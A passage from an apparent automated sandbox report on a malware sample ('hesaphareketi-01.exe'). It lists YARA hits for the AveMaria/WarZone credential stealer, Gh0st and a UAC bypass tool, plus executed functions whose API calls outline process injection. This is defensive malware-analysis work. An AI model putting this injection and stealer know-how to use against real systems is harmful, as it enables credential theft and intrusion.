                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: AveMaria_WarZone, Description: unknown, Source: 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.375283442.0000000000EBA000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000011.00000002.510538676.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000011.00000002.510538676.000000000054F000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000003.375468406.0000000000EBA000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Analysis Process: hesaphareketi-01.exe PID: 1700 Parent PID: 3060 hesaphareketi-01.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00DD2E58, Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K0F
                                                                    • API String ID: 0-3207597744
                                                                    • Opcode ID: 410b24d467b2d5a861ae51adc00eabc2420f44c65fdf67f8ae0a8602d293a32b
                                                                    • Instruction ID: 317475eff44d279d28fa1898d2564d138d1b9b68c4a1810d4ab74e72e2f3293d
                                                                    • Opcode Fuzzy Hash: 410b24d467b2d5a861ae51adc00eabc2420f44c65fdf67f8ae0a8602d293a32b
                                                                    • Instruction Fuzzy Hash: 50A13A70904209CFDB04CFA9D858BBDBBB1BF89304F14802BE456A7364DB749985DF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DD2E68, Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K0F
                                                                    • API String ID: 0-3207597744
                                                                    • Opcode ID: a0419282fe468a3aa4a973343e9f50ce7cc4a13e24169961dbdb85ada198cf04
                                                                    • Instruction ID: 7019cc6a2c13a56bbd5f86c275f11623552d310ce0b4f8909ea596e0055b111c
                                                                    • Opcode Fuzzy Hash: a0419282fe468a3aa4a973343e9f50ce7cc4a13e24169961dbdb85ada198cf04
                                                                    • Instruction Fuzzy Hash: 60A15C70D04209CFEB04CFA9D848BBDBBB1BB85304F10802BE452A73A4DB749985DF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DD5F11, Relevance: .3, Instructions: 311COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 685036c3b59a5443ceab252e43a2f952f1287ee58c45491b21010f392dd68d1c
                                                                    • Instruction ID: 8a52b7db65795cf739a463a86bdef0721e5caf5f0585d71fa3195c5c7cca8654
                                                                    • Opcode Fuzzy Hash: 685036c3b59a5443ceab252e43a2f952f1287ee58c45491b21010f392dd68d1c
                                                                    • Instruction Fuzzy Hash: EAB1D471A05A5DCFDB01CFA9D8895ADBFB1FF4A300B1585DAD484AB212D734D84ACBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DD6010, Relevance: .3, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b2cc553832465b73c12489a979bc6be86d6966682b02d62f6de2b29f18b319a
                                                                    • Instruction ID: 605f3d244971262793ae162d7442d55a7dca02c28e7a6f772c5cf4ff6902b9e1
                                                                    • Opcode Fuzzy Hash: 1b2cc553832465b73c12489a979bc6be86d6966682b02d62f6de2b29f18b319a
                                                                    • Instruction Fuzzy Hash: 9FA14871E006698BCB14CBA9C8806ADFBF1FF98305F18866AD455E7306D734ED46CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DDE688, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00DDE8BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: b987c1f17e67b53de63cdab99f91cab764dda2d08a1db3a8868cfc77f16a940b
                                                                    • Instruction ID: 7b5d4024644c0d9c551f16d6bac156fe58df17d0ef35deb38dde07690f5d5f51
                                                                    • Opcode Fuzzy Hash: b987c1f17e67b53de63cdab99f91cab764dda2d08a1db3a8868cfc77f16a940b
                                                                    • Instruction Fuzzy Hash: DB913971D002199FDB60DFA8C8817EEBBB2FF48314F14856AD859AB340DB749985CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05950774, Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 05950881
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: BaseModuleName
                                                                    • String ID:
                                                                    • API String ID: 595626670-0
                                                                    • Opcode ID: 3126474d94c8a8b18ae4400487b851011bc79c972065e5fdf7400e3ac40f73d7
                                                                    • Instruction ID: 8fbfbb4c266c9a67efc6b2d378ad40c842b52cca912355cb4f26222f4052ceca
                                                                    • Opcode Fuzzy Hash: 3126474d94c8a8b18ae4400487b851011bc79c972065e5fdf7400e3ac40f73d7
                                                                    • Instruction Fuzzy Hash: CD415470D042489FDB14CFA8C898BDEBBB5BF48324F14C569E95AAB240C7799885CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05950780, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 05950881
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: BaseModuleName
                                                                    • String ID:
                                                                    • API String ID: 595626670-0
                                                                    • Opcode ID: 21888e03a51b0fe5405a6b12cf2c4cf826f73c6da0ba5101531feedf32abd2eb
                                                                    • Instruction ID: 8dd9e0efae8a1d918b2757d486eaaa84d1d19bfc18a4dce7d745c73414193a86
                                                                    • Opcode Fuzzy Hash: 21888e03a51b0fe5405a6b12cf2c4cf826f73c6da0ba5101531feedf32abd2eb
                                                                    • Instruction Fuzzy Hash: FE413470D042489FCB14CFA9C898BDEBBB5BF48324F148529E91AAB240D7799885CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DD7524, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(?), ref: 00DDB3C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 7bda5279d65a425b5fc08d10aad3f553a9baafcc9f37d0eaa6a62dc69facba12
                                                                    • Instruction ID: 460f2a446fee1d735f7eb66ed7883b6fffee3d346034ef980f3c31f65e00e38d
                                                                    • Opcode Fuzzy Hash: 7bda5279d65a425b5fc08d10aad3f553a9baafcc9f37d0eaa6a62dc69facba12
                                                                    • Instruction Fuzzy Hash: 6431C2B0D01208DFDB14CFD9D584BDEBBF9AF48328F24842AE405AB351DB756949CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DDBC88, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CopyFileW.KERNELBASE(?,00000000,?), ref: 00DDBD21
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CopyFile
                                                                    • String ID:
                                                                    • API String ID: 1304948518-0
                                                                    • Opcode ID: 5a7a7170d9313fef955a38881c6efdfb973a7c0ffa0c8c3cf22aede836b1e2fb
                                                                    • Instruction ID: 77105ec5fb999e2b747478f38abf89a161d6edbcfbffb68acb8b10bbc9d04bd7
                                                                    • Opcode Fuzzy Hash: 5a7a7170d9313fef955a38881c6efdfb973a7c0ffa0c8c3cf22aede836b1e2fb
                                                                    • Instruction Fuzzy Hash: 142117B1D012199FCB10CFA9D484BEEFBF5EB48324F19816AE818A7345D7749A44CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DDE4E0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 00DDE570
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 877c136f67b10ef9d5eccca8dc63fd773b288ac988e92364616bd9394da59048
                                                                    • Instruction ID: 0690828fb45bc4493bf8d44903d3622638b1b2f666ab6438335d59469e8400b7
                                                                    • Opcode Fuzzy Hash: 877c136f67b10ef9d5eccca8dc63fd773b288ac988e92364616bd9394da59048
                                                                    • Instruction Fuzzy Hash: B22146B19003099FCB10DFA9C8847EEBBF5FF48354F44882AE919A7340D7789954CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DDEAC8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DDEB48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: 1f1708a89e345d4c3c8ad05dedb456ba745351f557bf52efdd4299e17fcb538b
                                                                    • Instruction ID: 509ccb9dda9e53ffbd04408461b417d52e5b8f8b103ef3f8a69d0b66e93f4c35
                                                                    • Opcode Fuzzy Hash: 1f1708a89e345d4c3c8ad05dedb456ba745351f557bf52efdd4299e17fcb538b
                                                                    • Instruction Fuzzy Hash: D2212A718003499FCB00DFA9C8846EEFBF5FF48324F54882AE519A7240D7789955CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DDE348, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 00DDE3C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    • Opcode ID: 1b0c42b7a0c89e7b2a55dbba25d09ce85b1f9b051db41a597e463fc2c7d62527
                                                                    • Instruction ID: b16d64ca2cb171dde02e042268d2114352c5365fb9f1b48330d74cb06f8812ac
                                                                    • Opcode Fuzzy Hash: 1b0c42b7a0c89e7b2a55dbba25d09ce85b1f9b051db41a597e463fc2c7d62527
                                                                    • Instruction Fuzzy Hash: 1E2137719003099FCB10DFAAC4847EEBBF8AB48324F14842AD559A7240DB78A985CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05950348, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 059503D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EnumProcesses
                                                                    • String ID:
                                                                    • API String ID: 84517404-0
                                                                    • Opcode ID: f3a420f94adc23fa76f738cbd650524eb7ff0b86daa0d80a54c731cdd208974b
                                                                    • Instruction ID: 62565c4a9df3a99c18b48b4cfaf50e7af5e45ba544e4c6989b5c83f08a52a22d
                                                                    • Opcode Fuzzy Hash: f3a420f94adc23fa76f738cbd650524eb7ff0b86daa0d80a54c731cdd208974b
                                                                    • Instruction Fuzzy Hash: 4A2107B5D006199FCB00CF99D985BDEFBB8FB08324F14852AE918F7640D778A9548BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05950350, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 059503D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EnumProcesses
                                                                    • String ID:
                                                                    • API String ID: 84517404-0
                                                                    • Opcode ID: f6010912225465bb97b70911648f6e39882955181b1d1882b848a4ec71aca1bf
                                                                    • Instruction ID: 323588f4c05d3a2fc3d507c560b1442a07cbaf4dcab7bb9aa322e630c67490ec
                                                                    • Opcode Fuzzy Hash: f6010912225465bb97b70911648f6e39882955181b1d1882b848a4ec71aca1bf
                                                                    • Instruction Fuzzy Hash: E721E2B5D016199FCB00CF99D885BDEFBB8FB48324F14812AE918B7240D778A9548BA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05950C40, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 05950CC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID:
                                                                    • API String ID: 3555792229-0
                                                                    • Opcode ID: 87fb046acd751903fd73d9ce11017bfecea2f240715365e517c70b06d4de3cb1
                                                                    • Instruction ID: d9cba189c91e6577412e1b43a225117e2122f75e8d9ff788068310e3c4d73090
                                                                    • Opcode Fuzzy Hash: 87fb046acd751903fd73d9ce11017bfecea2f240715365e517c70b06d4de3cb1
                                                                    • Instruction Fuzzy Hash: CB2149B1D002498FDB14CF99C844BEEFBF5BF99324F14882AE455A3650D778A945CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 05950C48, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 05950CC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID:
                                                                    • API String ID: 3555792229-0
                                                                    • Opcode ID: c1853b4f1d2e817c0eebfe44dd236c61a4ea830e5aa530d8672bf63aa94236c2
                                                                    • Instruction ID: 7dcae2a468c6a918f84a6e5e9f741503228f225114e3251a582b5b712c54acfa
                                                                    • Opcode Fuzzy Hash: c1853b4f1d2e817c0eebfe44dd236c61a4ea830e5aa530d8672bf63aa94236c2
                                                                    • Instruction Fuzzy Hash: 2C211871D002098FDB14CF99C844BEEFBF9BB89324F148429D555A3250DB78A945CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 059506B0, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0595072B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EnumModulesProcess
                                                                    • String ID:
                                                                    • API String ID: 1082081703-0
                                                                    • Opcode ID: 49801bee2763849487fc3aa1a9c8da7155457b28dbd43826a03e8197c344cdcf
                                                                    • Instruction ID: 59d8d8511a9b42547a1a3199f1ec142958c0afd0ea0df1195d3328da6d50eeca
                                                                    • Opcode Fuzzy Hash: 49801bee2763849487fc3aa1a9c8da7155457b28dbd43826a03e8197c344cdcf
                                                                    • Instruction Fuzzy Hash: 2A2127B59002099FCB10CF99C988BDEBBF8FF48324F148429E969A7240D7789945CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DD7518, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(?,00000000,?,?), ref: 00DDB623
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: badd9a6d9744e8d454b3856baf67408c8de3ab8695d71823f31f45e26ed63b15
                                                                    • Instruction ID: c69f4e46893bdc1aa3a27a213c6e65716ac8ba5a460fc1b4bac36e652ec73b5f
                                                                    • Opcode Fuzzy Hash: badd9a6d9744e8d454b3856baf67408c8de3ab8695d71823f31f45e26ed63b15
                                                                    • Instruction Fuzzy Hash: 4921F7759002499FCB10CF9AC484BDEBBF8EB48324F14842AE959A7340D778A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 059506B8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0595072B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.373741624.0000000005950000.00000040.00000001.sdmp, Offset: 05950000, based on PE: false
                                                                    Similarity
                                                                    • API ID: EnumModulesProcess
                                                                    • String ID:
                                                                    • API String ID: 1082081703-0
                                                                    • Opcode ID: ea3ffe5902e84c76f0da0cdde4fa7f5b9223c9d41b372e0f4b5d3a5bc5032e0e
                                                                    • Instruction ID: 1b2bcb3f891e581abf3c879021101ab0d900d2276fcbfe2c0c4b8d21dfe9c04b
                                                                    • Opcode Fuzzy Hash: ea3ffe5902e84c76f0da0cdde4fa7f5b9223c9d41b372e0f4b5d3a5bc5032e0e
                                                                    • Instruction Fuzzy Hash: 892138B58002099FCB10CF9AC488BDEBBF8FB48320F148429E959A7200D778A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DDE420, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DDE48E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: ac9e099a870347f899de9e91bf920a0b7c806ac5c3fd9897430c144fd4b9eb12
                                                                    • Instruction ID: e2dc1350eda32f620aa66189092dd43aac4d4012c64cfe6e21a9b4bb274e2dd0
                                                                    • Opcode Fuzzy Hash: ac9e099a870347f899de9e91bf920a0b7c806ac5c3fd9897430c144fd4b9eb12
                                                                    • Instruction Fuzzy Hash: D91126719002499FCB10DFA9C8446EFBBF9AF48324F14881AE515A7250C775A954CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DDE298, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 85604b05741dccdbf1a143cb2efcc4271653f5150537e2773e8368a4c7f2e3a8
                                                                    • Instruction ID: e6b51338a8ac2ad5300aed56fbf9744613aac4eaa8c93bb35d6eba74abdfee95
                                                                    • Opcode Fuzzy Hash: 85604b05741dccdbf1a143cb2efcc4271653f5150537e2773e8368a4c7f2e3a8
                                                                    • Instruction Fuzzy Hash: 7F11F8B19002498BCB10DFAAC4447EFFBF9AB48324F14881AD555A7240DB79A945CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00DD3288, Relevance: .2, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b5ea8af18e888e12b5405202b93541abf429b2437b1b74f1e123b6b0ca74bb4b
                                                                    • Instruction ID: 6383b87014f5d223ce86e51719c8b3879760b75774acbaa17700ebc1f043311c
                                                                    • Opcode Fuzzy Hash: b5ea8af18e888e12b5405202b93541abf429b2437b1b74f1e123b6b0ca74bb4b
                                                                    • Instruction Fuzzy Hash: 22714C70A081448FD748DFBAE945AAA7BE3FFCA308B04D879D1059B268EF701945CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DD3298, Relevance: .2, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.372259496.0000000000DD0000.00000040.00000001.sdmp, Offset: 00DD0000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 87346b77e61937d722b3c3ad2bc081a4017ab429500ef934f2608ace53a6288a
                                                                    • Instruction ID: 419f0d51d97acfc2d56317ad7e604da09f18e926e744ba06658bf2d4c5ba69d2
                                                                    • Opcode Fuzzy Hash: 87346b77e61937d722b3c3ad2bc081a4017ab429500ef934f2608ace53a6288a
                                                                    • Instruction Fuzzy Hash: B6614C70A082488BD748EFBAE945A9E7BE3BBCA304B04D879D1059B268DF701945CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: hesaphareketi-01.exe PID: 6512 Parent PID: 1700 hesaphareketi-01.exeCOMMON

                                                                    Executed Functions

                                                                    Function 042094E0, Relevance: 13.7, APIs: 9, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 04209340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 0420938B
                                                                      • Part of subcall function 04209340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 042093CC
                                                                      • Part of subcall function 04209340: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 042093EC
                                                                      • Part of subcall function 04209340: _malloc.LIBCMT ref: 042093F9
                                                                      • Part of subcall function 04209340: _free.LIBCMT ref: 04209408
                                                                    • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 0420953B
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,?,?), ref: 04209572
                                                                    • _malloc.LIBCMT ref: 0420957A
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,?), ref: 0420959E
                                                                    • _free.LIBCMT ref: 042095A5
                                                                    • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 042095E0
                                                                    • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 0420962E
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 04209663
                                                                    • _free.LIBCMT ref: 0420966C
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiVersionWide_free$_malloc$DiskFreeSpace$FullNamePath
                                                                    • String ID:
                                                                    • API String ID: 2298454362-0
                                                                    • Opcode ID: db38db2b4be09819b6cc607101978a09cdd737b4802beb7d032686fd8ab10c66
                                                                    • Instruction ID: 26e4123be18a8e8078a846206ae3cae018cd2863c04049ad96426fd6f93d7f2b
                                                                    • Opcode Fuzzy Hash: db38db2b4be09819b6cc607101978a09cdd737b4802beb7d032686fd8ab10c66
                                                                    • Instruction Fuzzy Hash: 2441E6B1B202149FEB25DF65DC49BEA77E8EB04314F0441A8E50A9B1C2E774BEC4CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04246B50, Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 588COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($API call with %s database connection pointer$d$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$invalid$misuse at line %d of [%.10s]
                                                                    • API String ID: 2102423945-2789757714
                                                                    • Opcode ID: 273302c0596fc1522a3b4620d55f800355032f6c698cb2bbf9a20e562a793c7b
                                                                    • Instruction ID: 6d4ef1e0b3796ac763cdda9a0c7e0890dfeecfd1f59916de5b1cd376372b1be2
                                                                    • Opcode Fuzzy Hash: 273302c0596fc1522a3b4620d55f800355032f6c698cb2bbf9a20e562a793c7b
                                                                    • Instruction Fuzzy Hash: BC229070B253129BEB28CF28D880B2AB7E4FFC5708F04446DE9559B241E779F954CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042142D0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 486COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: :memory:
                                                                    • API String ID: 2102423945-2920599690
                                                                    • Opcode ID: 6685c7c59f91dfb4c5b1119b48df880dcdbf607e93030bebe756ee78fafdcc3a
                                                                    • Instruction ID: dfb0df2fe923d9222aa538426571e84cc32e6dfb641749701894f34ac4423bc7
                                                                    • Opcode Fuzzy Hash: 6685c7c59f91dfb4c5b1119b48df880dcdbf607e93030bebe756ee78fafdcc3a
                                                                    • Instruction Fuzzy Hash: 4112D5B0B202568FEB20EF38D884B5ABBF5AF11308F1481A9D85D9B252D775F944CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04209970, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(0427EC40,042033B4,?,042636AD), ref: 042099A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
